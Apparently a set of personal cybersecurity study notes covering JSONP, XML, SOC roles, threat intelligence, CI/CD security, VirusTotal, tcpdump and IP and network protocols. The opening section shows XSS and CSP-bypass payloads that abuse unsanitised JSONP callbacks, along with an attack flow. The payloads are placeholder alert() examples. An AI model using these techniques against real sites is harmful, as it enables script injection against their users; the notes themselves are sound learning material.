If the server responds with:

handleData({ "name": "John", "age": 30 });

Then the browser will execute it, calling the handleData function defined on the page.

What is the `callback` parameter?

The callback is a query parameter in the request that tells the server which JavaScript function to wrap the data in. It's often user-controlled.

So this:

https://example.com/data?callback=handleData

can return:

handleData({ "data": "value" });

How is JSONP used in XSS / CSP Bypass?

1. XSS via JSONP

If a site includes a JSONP endpoint and does not validate or sanitize the callback parameter, an attacker can inject arbitrary JavaScript.

Example:

<script src="https://vulnerable.com/jsonp?callback=alert(1)"></script>

If the response is:

alert(1)({ "key": "value" });

JavaScript sees this as a syntax error, but with some trickery (e.g., if the server responds with just alert(1), or something like */alert(1)//), the attacker might get execution.

A more realistic payload could be:

<script src="https://vulnerable.com/jsonp?callback=evil"></script>
<script>
  function evil(data) {
    // exploit here
    alert("XSS via JSONP");
  }
</script>

2. CSP Bypass using JSONP

Content Security Policy (CSP) helps mitigate XSS by restricting sources of scripts, but if a CSP allows loading scripts from a JSONP-enabled domain, attackers can exploit that.

Example scenario:

CSP allows script-src https://api.trusted.com.
https://api.trusted.com/jsonp?callback=anything returns arbitrary JavaScript (unsanitized).
Attacker injects:

<script src="https://api.trusted.com/jsonp?callback=alert(1)"></script>

Since https://api.trusted.com is allowed by CSP, the browser loads and executes the response — CSP is bypassed.

Realistic Attack Flow:

Attacker finds a JSONP endpoint on a trusted domain in the CSP.
Attacker injects a <script> tag pointing to that JSONP endpoint with a malicious callback.
The browser loads and executes the JavaScript — bypassing CSP and achieving XSS.

[Vault: Web Security] XML

Mon, 08 Dec 2025 19:12:35 GMT

XML (eXtensible Markup Language) is a language and a format used for storing and transmitting data. XML is a native file format used in Windows systems. XML syntax uses the following:

Tags
Elements
Attributes

Elements

XML elements include both the data contained inside of a tag and the tags itself. All XML entries must contain at least one root element. Root elements contain other elements that sit underneath them, known as child elements. Here is an example:

<Event> 
	<EventID>4688</EventID> 
	<Version>5</Version> 
</Event>

In this example, <Event> is the root element and contains two child elements <EventID> and <Version>. There is data contained in each respective child element.

Attributes

XML elements can also contain attributes. Attributes are used to provide additional information about elements. Attributes are included as the second part of the tag itself and must always be quoted using either single or double quotes.

For example:

<EventData>
    <Data Name='SubjectUserSid'>S-2-3-11-160321</Data>
    <Data Name='SubjectUserName'>JSMITH</Data>
    <Data Name='SubjectDomainName'>ADCOMP</Data>
    <Data Name='SubjectLogonId'>0x1cf1c12</Data>
    <Data Name='NewProcessId'>0x1404</Data>
</EventData>

In the first line for this example, the tag is <Data> and it uses the attribute Name='SubjectUserSid' to describe the data enclosed in the tag S-2-3-11-160321.

[Vault: Defence and Response] SOC

Mon, 08 Dec 2025 15:31:55 GMT

A security operations center (SOC) is an organizational unit dedicated to monitoring networks, systems, and devices for security threats or attacks. Structurally, a SOC (usually pronounced "sock") often exists as its own separate unit or within a CSIRT. You may be familiar with the term blue team, which refers to the security professionals who are responsible for defending against all security threats and attacks at an organization. A SOC is involved in various types of blue team activities, such as network monitoring, analysis, and response to incidents.

SOC organization

A SOC is composed of SOC analysts, SOC leads, and SOC managers. Each role has its own respective responsibilities. SOC analysts are grouped into three different tiers. Tier 1 SOC analyst The first tier is composed of the least experienced SOC analysts who are known as level 1s (L1s). They are responsible for:

Monitoring, reviewing, and prioritizing alerts based on criticality or severity
Creating and closing alerts using ticketing systems
Escalating alert tickets to Tier 2 or Tier 3 Tier 2 SOC analyst The second tier comprises the more experienced SOC analysts, or level 2s (L2s). They are responsible for:
Receiving escalated tickets from L1 and conducting deeper investigations
Configuring and refining security tools
Reporting to the SOC Lead Tier 3 SOC lead The third tier of a SOC is composed of the SOC leads, or level 3s (L3s). These highly experienced professionals are responsible for:
Managing the operations of their team
Exploring methods of detection by performing advanced detection techniques, such as malware and forensics analysis
Reporting to the SOC manager SOC manager The SOC manager is at the top of the pyramid and is responsible for:
Hiring, training, and evaluating the SOC team members
Creating performance metrics and managing the performance of the SOC team
Developing reports related to incidents, compliance, and auditing
Communicating findings to stakeholders such as executive management Other roles SOCs can also contain other specialized roles such as:
Forensic investigators: Forensic investigators are commonly L2s and L3s who collect, preserve, and analyze digital evidence related to security incidents to determine what happened.
Threat hunters: Threat hunters are typically L3s who work to detect, analyze, and defend against new and advanced cybersecurity threats using threat intelligence.

Note: Just like CSIRTs, the organizational structure of a SOC can differ depending on the organization.

Resources

The security operations ecosystem
Cyber career pathways tool
Detection and Response at Google: Episode 2 of the Hacking Google series of videos

[Vault: Defence and Response] Threat Intelligence

Mon, 08 Dec 2025 15:31:55 GMT

Threat intelligence is evidence-based threat information that provides context about existing or emerging threats. Threat intelligence can come from private or public sources like:

Industry reports: These often include details about attacker's tactics, techniques, and procedures (TTP).
Government advisories: Similar to industry reports, government advisories include details about attackers' TTP.
Threat data feeds: Threat data feeds provide a stream of threat-related data that can be used to help protect against sophisticated attackers like advanced persistent threats (APTs). APTs are instances when a threat actor maintains unauthorized access to a system for an extended period of time. The data is usually a list of indicators like IP addresses, domains, and file hashes.

It can be difficult for organizations to efficiently manage large volumes of threat intelligence. Organizations can leverage a threat intelligence platform (TIP) which is an application that collects, centralizes, and analyzes threat intelligence from different sources. TIPs provide a centralized platform for organizations to identify and prioritize relevant threats and improve their security posture.

Crowdsourcing is the practice of gathering information using public input and collaboration. Threat intelligence platforms use crowdsourcing to collect information from the global cybersecurity community. Traditionally, an organization's response to incidents was performed in isolation. A security team would receive and analyze an alert, and then work to remediate it without additional insights on how to approach it. Without crowdsourcing, attackers can perform the same attacks against multiple organizations. With crowdsourcing, organizations harness the knowledge of millions of other cybersecurity professionals, including cybersecurity product vendors, government agencies, cloud providers, and more. Crowdsourcing allows people and organizations from the global cybersecurity community to openly share and access a collection of threat intelligence data, which helps to continuously improve detection technologies and methodologies.

[[Virustotal]]
Jotti's malware scan is a free service that lets you scan suspicious files with several antivirus programs. There are some limitations to the number of files that you can submit.
Urlscan.io is a free service that scans and analyzes URLs and provides a detailed report summarizing the URL information.
MalwareBazaar is a free repository for malware samples. Malware samples are a great source of threat intelligence that can be used for research purposes.

IoC and IoA

Indicators of compromise (IoCs) are observable evidence that suggests signs of a potential security incident. IoCs chart specific pieces of evidence that are associated with an attack, like a file name associated with a type of malware. You can think of an IoC as evidence that points to something that's already happened, like noticing that a valuable has been stolen from inside of a car.

Indicators of attack (IoA) are the series of observed events that indicate a real-time incident. IoAs focus on identifying the behavioral evidence of an attacker, including their methods and intentions.

Essentially, IoCs help to identify the who and what of an attack after it's taken place, while IoAs focus on finding the why and how of an ongoing or unknown attack. For example, observing a process that makes a network connection is an example of an IoA. The filename of the process and the IP address that the process contacted are examples of the related IoCs.

Pyramid of pain

Not all indicators of compromise (IOCs) hold the same value for security teams. Understanding the different types helps professionals detect and respond effectively. To improve IOC usage in incident detection, security researcher David J. Bianco developed the Pyramid of Pain concept. ![[attachments/Threat-Intelligence-img-202512081756.png|667x352]]

The Pyramid of Pain captures the relationship between indicators of compromise and the level of difficulty that malicious actors experience when indicators of compromise are blocked by security teams. It lists the different types of indicators of compromise that security professionals use to identify malicious activity.

Each type of indicator of compromise is separated into levels of difficulty. These levels represent the “pain” levels that an attacker faces when security teams block the activity associated with the indicator of compromise. For example, blocking an IP address associated with a malicious actor is labeled as easy because malicious actors can easily use different IP addresses to work around this and continue with their malicious efforts. If security teams are able to block the IoCs located at the top of the pyramid, the more difficult it becomes for attackers to continue their attacks. Here’s a breakdown of the different types of indicators of compromise found in the Pyramid of Pain.

Hash values: Hashes that correspond to known malicious files. These are often used to provide unique references to specific samples of malware or to files involved in an intrusion.
IP addresses: An internet protocol address like 192.168.1.1
Domain names: A web address such as www.google.com
Network artifacts: Observable evidence created by malicious actors on a network. For example, information found in network protocols such as User-Agent strings.
Host artifacts: Observable evidence created by malicious actors on a host. A host is any device that’s connected on a network. For example, the name of a file created by malware.
Tools: Software that’s used by a malicious actor to achieve their goal. For example, attackers can use password cracking tools like John the Ripper to perform password attacks to gain access into an account.
Tactics, techniques, and procedures (TTPs): This is the behavior of a malicious actor. Tactics refer to the high-level overview of the behavior. Techniques provide detailed descriptions of the behavior relating to the tactic. Procedures are highly detailed descriptions of the technique. TTPs are the hardest to detect.

[Vault: System Security] CI-CD

Mon, 08 Dec 2025 15:31:55 GMT

Continuous Integration, Continuous Delivery, and Continuous Deployment (CI/CD) pipelines are essential for modern software development. They help teams deliver software faster and more efficiently.

Continuous Integration (CI) is all about frequently merging code changes from different developers into a central location. This triggers automated processes like building the software and running tests. CI catches problems through an automated process: every time code is integrated, the system automatically builds and tests it. This immediate feedback loop reveals integration problems as soon as they occur. CI helps catch integration problems early, leading to higher quality code. Think of it as the foundation of the pipeline.

Continuous Delivery means your code is always ready to be released to users. After passing automated tests, code is automatically deployed to a staging environment (a practice environment) or prepared for final release. Typically, a manual approval step is still needed before going live to production, which provides a control point.

Continuous Deployment automates the entire release process. Changes that pass all automated checks are automatically deployed directly to the live production environment, with no manual approval. This is all about speed and efficiency.

![[attachments/CI-CD-1765043325442.png]]

Security Benefits of Continuous Delivery and Deployment

CD allows you to build security checks right into your deployment pipeline. These automated security checks can include:

Dynamic Application Security Testing (DAST): Automated tests that find vulnerabilities in running applications in realistic staging environments.
Security Compliance Checks: Automated checks that ensure software meets your organization’s security rules and policies.
Infrastructure Security Validations: Checks that make sure the systems hosting your software are secure.

Importance of secure CI/CD pipelines

Secure Automation: CI/CD automates repetitive tasks: building, testing, deploying. When automation is implemented securely, this reduces errors from manual work, speeds processes, and importantly, reduces human errors that create vulnerabilities. However, insecure automation automates the introduction of vulnerabilities at scale.
Improved Code Quality Via Security Checks: Automated tests in CI/CD rigorously check code before release. Crucially, this includes automated security tests. This leads to fewer bugs and security weaknesses in final software, but only if security tests integrate effectively within the pipeline.
Faster Time to Market for Security Updates: CI/CD accelerates releases. This enables faster delivery of new features, bug fixes, and security updates, improving response time to both user needs and security threats. This rapid deployment of security updates is a significant security advantage of a well-secured CI/CD pipeline.
Enhanced Collaboration and Feedback with Safety Focus: CI/CD encourages collaboration between development, security, testing, and operations teams. Quick feedback loops aid identification and resolution of vulnerabilities early in development. This collaborative environment is essential to build security into the pipeline and address vulnerabilities proactively.
Reduced Risk: Frequent, smaller releases, a result of CI/CD, are less risky than large, infrequent releases. If issues arise (including security issues), pinpointing and fixing the problem becomes easier. This also applies to security vulnerabilities; smaller, frequent releases limit the potential impact of a security flaw introduced in any single release, provided security monitoring and testing remain continuous.

Common CI/CD vulns

Insecure Dependencies: Risks from Third-Party Code

CI/CD pipelines often use many third-party libraries and components. If these components have known vulnerabilities (Common Vulnerabilities and Exposures, or CVEs), those vulnerabilities can be unknowingly added to your application during the automated build process.

Action Step: Regularly scan and update your dependencies. Make sure you’re using secure versions of all external components.

Misconfigured Permissions: Controlling Access

Weak access controls in CI/CD tools, code repositories, and related systems are a significant vulnerability. Unauthorized access can allow attackers to modify code, pipeline configurations, or inject malicious content.

Action Step: Implement strong access management using Role-Based Access Control (RBAC). Ensure only authorized individuals can access and change critical pipeline elements.

Lack of Automated Security Testing: Missing Critical Checks

Failing to include automated security testing in your CI/CD pipeline is a serious error. Without tools like SAST and DAST, you are almost guaranteed to release software full of vulnerabilities that will go undetected until after it's live, leading to significantly higher costs and effort to fix..

Action Step: Integrate automated security testing (SAST and DAST) into your CI/CD pipeline. This should be a core part of your secure CI/CD strategy.

Exposed Secrets: Protecting Sensitive Information

Hardcoding sensitive data like API keys, passwords, and tokens directly into code or pipeline settings is a serious security mistake. If exposed, these secrets can lead to major security breaches.

Action Step: Never hardcode secrets. Use secure vaults or dedicated secrets management tools to store and manage sensitive information. Enforce this practice across your team.

Unsecured Build Environments: Protecting the Pipeline Infrastructure

The CI/CD environment itself (the servers and systems that run your pipeline) needs to be secure. If this environment is vulnerable, attackers can compromise it to alter builds, inject malicious code, or steal sensitive data.

Action Step: Harden your build environments. Use secure containers or virtual machines to minimize the risk of a compromised pipeline.

Building a Secure CI/CD Pipeline: Defense in Depth

To proactively address these vulnerabilities, a layered security approach is key. Here are essential best practices for your CI/CD security strategy:

Integrate Security from the Start: Embrace DevSecOps: Adopt a DevSecOps mindset. This means building security into every stage of development, from planning to deployment and beyond. This naturally includes embedding security checks into your CI/CD pipeline.
Implement Strong Access Controls: Use strict permission policies based on the principle of least privilege. Only grant necessary access to code, pipeline settings, and deployment configurations. Use tools like Multi-Factor Authentication (MFA) and Role-Based Access Control (RBAC) to secure your CI/CD environment.
Automate Security Testing Everywhere: Make automated security scans and tests a fundamental part of your build and deployment process. Tools like SAST, Software Composition Analysis (SCA), and DAST are not optional extras – they are essential for a secure CI/CD pipeline so you can catch vulnerabilities early.
Keep Dependencies Updated: Maintain a current inventory of all third-party dependencies, libraries, and CI/CD plugins. Regularly update these components to patch security vulnerabilities (CVEs). Tools like Dependabot and Snyk can automate dependency management.
Secure Secrets Management: Never hardcode sensitive information in your code or pipeline configurations. Require the use of dedicated secrets management tools like HashiCorp Vault or AWS Secrets Manager. Securely store, access, and rotate secrets throughout the CI/CD process.

Common Indicators of Compromise (IoCs) in CI/CD Pipelines

Understanding common CI/CD IoCs helps you monitor effectively and quickly find security incidents. Here are some examples:

Unauthorized Code Changes:
- Code changes from people who shouldn't be making changes.
- Code changes made at unusual times or from unexpected locations.
- Code changes that look suspicious, like confusing code, very large deletions without a good reason, or code that doesn't follow coding rules.
Suspicious Deployment Patterns:
- Deployments to unusual or unapproved systems (for example, production deployments started directly from developer branches).
- Deployments happening at unexpected times or too often (deployments outside of planned release times).
- Deployments started by unusual user accounts or automated accounts that shouldn't be releasing to production.
Compromised Dependencies:
- Finding known vulnerabilities (CVEs) in dependencies during automated checks in the CI/CD pipeline.
- Suddenly adding new, unexpected dependencies to build settings.
- Attempts to download dependencies from unofficial or untrusted sources.
Unusual Pipeline Execution:
- Pipeline steps that normally work fine suddenly failing.
- Pipelines takeing much longer to run for no clear reason.
- Changes in the order or way pipeline steps run without approved changes being made.
Secrets Exposure Attempts:
- Logs showing attempts to get to secrets from unapproved places in the pipeline.
- Finding private secrets hardcoded in code changes (ideally prevented earlier, but monitoring can catch mistakes).

Using Automation to Find Anomalies and IoCs

To monitor CI/CD pipelines and automatically find threats, you can use these methods:

Comprehensive Logging and Auditing

Detailed logs are the bases of monitoring. Logs provide the raw data that monitoring tools check for unusual activity and potential Indicators of Compromise (IoCs). The most common logs for finding anomalies include:

Pipeline Execution Logs: To effectively leverage pipeline execution logs for security monitoring, specialized tools employ automated baselining techniques. These tools analyze logs from successful, typical CI/CD pipeline runs to establish a profile of normal operation. This baseline encompasses key performance indicators such as the standard duration of each pipeline stage and expected success and failure rates. By continuously monitoring execution logs and comparing them against this established baseline, the tools can automatically detect anomalous activities. Deviations from the norm, including pipeline steps exceeding typical execution times, unexpected error occurrences, or alterations in the usual step order, are flagged as potential Indicators of Compromise (IoCs), warranting further security scrutiny.
Code Commit Logs: Keep track of code changes for each pipeline run. Unusual code changes, such as changes from people who shouldn't be making changes, changes made late at night, or changes with suspicious content (like very large deletions or confusing code), are important IoCs to monitor.
Access Logs: Monitoring tools can learn who usually accesses CI/CD. Unusual logins, like logins from different countries, failed login attempts followed by a successful login, or login attempts to change important pipeline settings, are strong indicators of compromise.
Deployment Logs: Tools can learn how often deployments usually happen and what those deployments look like. Unusual deployments, such as deployments at odd times or deployments to unexpected places, can be IoCs.

Security Information and Event Management (SIEM) Integration

Connecting your CI/CD logs to a SIEM tool can help automatically find anomalies at a large scale. SIEM platforms are made to:

Automatically Find Anomalies: SIEMs use machine learning and analytics to automatically find unusual patterns in CI/CD logs, which are possible IoCs to investigate.
Use Rules to Alert for Known IoCs: You can set up specific rules in the SIEM to find known CI/CD IoCs. For example, rules can send alerts when:
- Detection of specific malicious file hashes (related to known CI/CD attacks) are found in build results.
- CI/CD servers connect to known malicious command and control (C2) servers (using threat intelligence data).
- Someone tries to download or access private secrets outside of approved pipeline steps.

Real-time Alerting and Notifications

Automated alerts make sure security teams are notified right away about unusual activity and possible IoCs, so they can respond quickly. Alerts should be set up for:

Unusual Build Failures: Pipeline steps failing repeatedly, especially after code changes that shouldn't cause failures.
Suspicious Code Changes (Based on Anomalies): Alerts sent by code analysis tools that find highly unusual code changes based on size, author, or confusing content.
Attempts to Expose Secrets: Alerts sent by security tools when someone tries to access or steal secrets from unapproved parts of the pipeline.
Unusual Network Traffic: Alerts for unusual network traffic from CI/CD servers, especially traffic going out to unknown or suspicious locations.

Performance Monitoring to Find IoAs and Discover IoCs

Performance monitoring, while mainly used to make sure things are running smoothly, can also indirectly help find IoCs. Performance issues (Indicators of Attack - IoAs) like sudden slowdowns or CI/CD servers running out of resources can lead to deeper checks that may uncover IoCs.

Continuous Vulnerability Scanning

Regularly checking the CI/CD infrastructure for weaknesses can proactively find vulnerable parts. This includes Common Vulnerabilities and Exposures (CVEs) in CI/CD tools, plugins, and containers. These weaknesses are potential IoCs. They highlight areas that need to be patched right away to prevent attacks and possible pipeline compromise.

Resources:

DevSecOps Using GitHub Actions: Building Secure CI/CD Pipelines. https://medium.com/@rahulsharan512/devsecops-using-github-actions-building-secure-ci-cd-pipelines-5b6d59acab32
6 Steps for Success with CI/CD Securing Hardening. https://spectralops.io/blog/ci-cd-security-hardening/
GitLab CI/CD - Hands-On Lab: Securing Scanning. https://handbook.gitlab.com/handbook/customer-success/professional-services-engineering/education-services/gitlabcicdhandsonlab9/
How can you stay current with the latest problem solving techniques in Cloud Computing as a manager. https://www.linkedin.com/advice/1/how-can-you-stay-current-latest-problem-solving-msk5e
1. What is CI/CD? - Continuous Integration, Delivery, and Deployment. https://www.threatintelligence.com/blog/continuous-integration-continuous-delivery
1. Optimizing logs for a more effective CI/CD pipeline [Best Practices]. https://coralogix.com/blog/optimizing-logs-for-a-more-effective-ci-cd-pipeline/
Streamline Your CI/CD: Hand-on Anomaly Detection with AI. https://www.latesttechinsights.com/2024/04/streamline-your-cicd-hands-on-anomaly.html
CI/CD & DevOps Pipelines: An Introduction. https://www.splunk.com/en_us/blog/learn/ci-cd-devops-pipeline.html

[Vault: Tools] Virustotal

Mon, 08 Dec 2025 15:31:55 GMT

VirusTotal is a service that allows anyone to analyze suspicious files, domains, URLs, and IP addresses for malicious content. VirusTotal also offers additional services and tools for enterprise use. This reading focuses on the VirusTotal website, which is available for free and non-commercial use.

It can be used to analyze suspicious files, IP addresses, domains, and URLs to detect cybersecurity threats such as malware. Users can submit and check artifacts, like file hashes or IP addresses, to get VirusTotal reports, which provide additional information on whether an IoC is considered malicious or not, how that IoC is connected or related to other IoCs in the dataset, and more.

![[attachments/Image-2.png|A screenshot of the VirusTotal home page.]]

Here is a breakdown of the reports summary:

![[attachments/G6lzkoezTH--0Ly1-t-gyA_bf5046e9968f4a33b881b46561b750f1_CS_R-129_VirusTotal-reports.png|A screenshot of a VirusTotal reports summary.]]

Detection: The Detection tab provides a list of third-party security vendors and their detection verdicts on an IoC. For example, vendors can list their detection verdict as malicious, suspicious, unsafe, and more.
Details: The Details tab provides additional information extracted from a static analysis of the IoC. Information such as different hashes, file types, file sizes, headers, creation time, and first and last submission information can all be found in this tab.
Relations: The Relations tab provides related IoCs that are somehow connected to an artifact, such as contacted URLs, domains, IP addresses, and dropped files if the artifact is an executable.
Behavior: The Behavior tab contains information related to the observed activity and behaviors of an artifact after executing it in a controlled or sandboxed environment. This information includes tactics and techniques detected, network communications, registry and file systems actions, processes, and more.
Community: The Community tab is where members of the VirusTotal community, such as security professionals or researchers, can leave comments and insights about the IoC.
Vendors’ ratio and community score: The score displayed at the top of the report is the vendors’ ratio. The vendors’ ratio shows how many security vendors have flagged the IoC as malicious overall. Below this score, there is also the community score, based on the inputs of the VirusTotal community. The more detections a file has and the higher its community score is, the more likely that the file is malicious.

Note: Data uploaded to VirusTotal will be publicly shared with the entire VirusTotal community. Be careful of what you submit, and make sure you do not upload personal information.

[Vault: Tools] tcpdump

Mon, 08 Dec 2025 14:07:43 GMT

tcpdump is a command-line network protocol analyzer. It is popular, lightweight–meaning it uses little memory and has a low CPU usage–and uses the open-source libpcap library. tcpdump is text based, meaning all commands in tcpdump are executed in the terminal. It can also be installed on other Unix-based operating systems, such as macOS®. It is preinstalled on many Linux distributions.

tcpdump provides a brief packet analysis and converts key information about network traffic into formats easily read by humans. It prints information about each packet directly into your terminal. tcpdump also displays the source IP address, destination IP addresses, and the port numbers being used in the communications.

Interpreting output

tcpdump prints the output of the command as the sniffed packets in the command line, and optionally to a log file, after a command is executed. The output of a packet capture contains many pieces of important information about the network traffic.

Some information you receive from a packet capture includes:

Timestamp: The output begins with the timestamp, formatted as hours, minutes, seconds, and fractions of a second.
Source IP: The packet’s origin is provided by its source IP address.
Source port: This port number is where the packet originated.
Destination IP: The destination IP address is where the packet is being transmitted to.
Destination port: This port number is where the packet is being transmitted to.

Note: By default, tcpdump will attempt to resolve host addresses to hostnames. It'll also replace port numbers with commonly associated services that use these ports.

Common uses

tcpdump and other network protocol analyzers are commonly used to capture and view network communications and to collect statistics about the network, such as troubleshooting network performance issues. They can also be used to:

Establish a baseline for network traffic patterns and network utilization metrics.
Detect and identify malicious traffic
Create customized alerts to send the right notifications when network issues or security threats arise.
Locate unauthorized instant messaging (IM), traffic, or wireless access points.

However, attackers can also use network protocol analyzers maliciously to gain information about a specific network. For example, attackers can capture data packets that contain sensitive information, such as account usernames and passwords. As a cybersecurity analyst, It’s important to understand the purpose and uses of network protocol analyzers.

Usage

Manpage

sudo tcpdump [-i interface] [option(s)] [expression(s)]

eg: sudo tcpdump -i eth0 -s 0 -w packetdump.pcap

The -i command option allows you to specify the interface. If not specified or or -i any, tcpdump will capture all traffic on all interfaces. Options
The -s command option specifies the length of the snapshot for each packet. Setting this option to 0 sets it to the default of 262144.
The -w command option is used to write the result of the tcpdump command to a file. Adding the extension .pcap ensures that operating systems and applications will be able to read the file. All recorded traffic will be printed to the file packetdump.pcap.
Using the -r flag, you can read a packet capture file by specifying the file name as a parameter.
-v : for verbosity. By default, tcpdump will not print out all of a packet's information. There are three levels of verbosity you can use depending on how much packet information you want tcpdump to print out: -v, -vv, and -vvv.
The -c option stands for count. This option lets you control how many packets tcpdump will capture. For example, specifying -c 1 will only print out one single packet, whereas -c 10 prints out 10 packets.
-n : Using the -n flag disables the automatic mapping of numbers to names and is considered to be best practice when sniffing or analyzing traffic. Using -n will not resolve hostnames, whereas -nn will not resolve both hostnames or ports. By default, tcpdump will perform name resolution. This means that tcpdump automatically converts IP addresses to names. It will also resolve ports to commonly associated services that use these ports. This can be problematic because tcpdump isn’t always accurate in name resolution. Expressions You can also use filter expressions in tcpdump commands.
you can use filter expressions to isolate network packets.
You can also use boolean operators like and, or, or not to further filter network traffic for specific IP addresses, ports, and more.
eg: sudo tcpdump -r packetcapture.pcap -n 'ip and port 80'
You can also use parentheses to group and prioritize different expressions.
You can use the -D flag to list the network interfaces available on a system. OR In the ifconfig output, find the interface name that corresponds to the Ethernet adapter (usually eth0).

Interpreting output

eg: sudo tcpdump -i any -v -c 1 ![[attachments/tcpdump-1765191949803.png|691x149]]

Timestamp: The output begins with the timestamp, which starts with hours, minutes, seconds, and fractions of a second.
Source IP: The packet’s origin is provided by its source IP address.
Source port: This port number is where the packet originated.
Destination IP: The destination IP address is where the packet is being transmitted to.
Destination port: This port number is where the packet is being transmitted to.

[Vault: Networking] Internet Protocol (IP)

Mon, 08 Dec 2025 11:35:56 GMT

The Internet Protocol (IP) is the fundamental set of rules (protocol) that governs how data packets are addressed, routed, and delivered across networks, enabling communication between devices on the internet. IP operates as the foundation for all communications over the internet.

IP ensures that packets reach their destinations. There are two versions of IP that you will find in use today: IPv4 and IPv6. Both versions use different headers to structure packet information.

IPv4 packet

IPv4 is the most commonly used version of IP. ![[attachments/Internet-Protocol-(IP)-img-202512081246.png]] An IPv4 packet is made up of two sections, the header and the data:

An IPv4 header format is determined by the IPv4 protocol and includes the IP routing information that devices use to direct the packet. The size of the IPv4 header ranges from 20 to 60 bytes. The first 20 bytes are a fixed set of information containing data such as the source and destination IP address, header length, and total length of the packet. The last set of bytes can range from 0 to 40 and consists of the options field.
The length of the data section of an IPv4 packet can vary greatly in size. However, the maximum possible size of an IPv4 packet is 65,535 bytes. It contains the message being transferred over the internet, like website information or email text.

![[attachments/Internet-Protocol-(IP)-img-202512081246-1.png]]

There are 13 fields within the header of an IPv4 packet:

Version (VER): This 4 bit component tells receiving devices what protocol the packet is using. The packet used in the illustration above is an IPv4 packet.
IP Header Length (HLEN or IHL): HLEN is the packet’s header length. This value indicates where the packet header ends and the data segment begins.
Type of Service (ToS): Routers prioritize packets for delivery to maintain quality of service on the network. The ToS field provides the router with this information.
Total Length: This field communicates the total length of the entire IP packet, including the header and data. The maximum size of an IPv4 packet is 65,535 bytes.
Identification: IPv4 packets can be up to 65, 535 bytes, but most networks have a smaller limit. In these cases, the packets are divided, or fragmented, into smaller IP packets. The identification field provides a unique identifier for all the fragments of the original IP packet so that they can be reassembled once they reach their destination.
Flags: This field provides the routing device with more information about whether the original packet has been fragmented and if there are more fragments in transit.
Fragmentation Offset: The fragment offset field tells routing devices where in the original packet the fragment belongs.
Time to Live (TTL): TTL prevents data packets from being forwarded by routers indefinitely. It contains a counter that is set by the source. The counter is decremented by one as it passes through each router along its path. When the TTL counter reaches zero, the router currently holding the packet will discard the packet and return an ICMP Time Exceeded error message to the sender.
Protocol: The protocol field tells the receiving device which protocol will be used for the data portion of the packet.
Header Checksum: The header checksum field contains a checksum that can be used to detect corruption of the IP header in transit. Corrupted packets are discarded.
Source IP Address: The source IP address is the IPv4 address of the sending device.
Destination IP Address: The destination IP address is the IPv4 address of the destination device.
Options: The options field allows for security options to be applied to the packet if the HLEN value is greater than five. The field communicates these options to the routing devices.

IPv6 packet

IPv6 adoption has been increasing because of its large address space. There are eight fields in the header: ![[attachments/Internet-Protocol-(IP)-1765187529145.png]]

Version: This field indicates the IP version. For an IPv6 header, IPv6 is used.
Traffic Class: This field is similar to the IPv4 Type of Service field. The Traffic Class field provides information about the packet's priority or class to help with packet delivery.
Flow Label: This field identifies the packets of a flow. A flow is the sequence of packets sent from a specific source.
Payload Length: This field specifies the length of the data portion of the packet.
Next Header: This field indicates the type of header that follows the IPv6 header such as TCP.
Hop Limit: This field is similar to the IPv4 Time to Live field. The Hop Limit limits how long a packet can travel in a network before being discarded.
Source Address: This field specifies the source address of the sender.
Destination Address: This field specifies the destination address of the receiver.

https://en.wikipedia.org/wiki/Internet_Protocol

[Vault: Networking] Network Protocols

Mon, 08 Dec 2025 11:35:56 GMT

Network Protocols

Network protocols are a set of rules used by two or more devices on a network to describe the order of delivery and the structure of the data.

3 categories of network protocol

Communication protocols

Communication protocols govern the exchange of information in network transmission. They dictate how the data is transmitted between devices and the timing of the communication. They also include methods to recover data lost in transit. Here are a few of them.

Transmission Control Protocol (TCP) is an internet communication protocol that allows two devices to form a connection and stream data. TCP uses a three-way handshake process. First, the device sends a synchronize (SYN) request to a server. Then the server responds with a SYN/ACK packet to acknowledge receipt of the device's request. Once the server receives the final ACK packet from the device, a TCP connection is established. In the TCP/IP model, TCP occurs at the transport layer.
User Datagram Protocol (UDP) is a connectionless protocol that does not establish a connection between devices before a transmission. This makes it less reliable than TCP. But it also means that it works well for transmissions that need to get to their destination quickly. For example, one use of UDP is for sending DNS requests to local DNS servers. In the TCP/IP model, UDP occurs at the transport layer.
Hypertext Transfer Protocol ([[HTTP]]) is an application layer protocol that provides a method of communication between clients and website servers. HTTP uses port 80. HTTP is considered insecure, so it is being replaced on most websites by a secure version, called HTTPS that uses encryption from SSL/TLS for communication. However, there are still many websites that use the insecure HTTP protocol. In the TCP/IP model, HTTP occurs at the application layer.
Domain Name System ([[DNS]]) is a protocol that translates internet domain names into IP addresses. When a client computer wishes to access a website domain using their internet browser, a query is sent to a dedicated DNS server. The DNS server then looks up the IP address that corresponds to the website domain. DNS normally uses UDP on port 53. However, if the DNS reply to a request is large, it will switch to using the TCP protocol. In the TCP/IP model, DNS occurs at the application layer.

Management Protocols

The next category of network protocols is management protocols. Management protocols are used for monitoring and managing activity on a network. They include protocols for error reporting and optimizing performance on the network.

Simple Network Management Protocol (SNMP) is a network protocol used for monitoring and managing devices on a network. SNMP can reset a password on a network device or change its baseline configuration. It can also send requests to network devices for a report on how much of the network’s bandwidth is being used up. In the TCP/IP model, SNMP occurs at the application layer
Internet Control Message Protocol (ICMP) is an internet protocol used by devices to tell each other about data transmission errors across the network. ICMP is used by a receiving device to send a report to the sending device about the data transmission. ICMP is commonly used as a quick way to troubleshoot network connectivity and latency by issuing the “ping” command on a Linux operating system. In the TCP/IP model, ICMP occurs at the internet layer.

Security Protocols

Security protocols are network protocols that ensure that data is sent and received securely across a network. Security protocols use encryption algorithms to protect data in transit. Below are some common security protocols.

Hypertext Transfer Protocol Secure (HTTPS) is a network protocol that provides a secure method of communication between clients and website servers. HTTPS is a secure version of HTTP that uses secure sockets layer/transport layer security (SSL/TLS) encryption on all transmissions so that malicious actors cannot read the information contained. HTTPS uses port 443. In the TCP/IP model, HTTPS occurs at the application layer.
Secure File Transfer Protocol (SFTP) is a secure protocol used to transfer files from one device to another over a network. SFTP uses secure shell (SSH), typically through TCP port 22. SSH uses Advanced Encryption Standard (AES) and other types of encryption to ensure that unintended recipients cannot intercept the transmissions. In the TCP/IP model, SFTP occurs at the application layer. SFTP is used often with cloud storage. Every time a user uploads or downloads a file from cloud storage, the file is transferred using the SFTP protocol.

[[Wireless Protocols]]

Network Address Translation

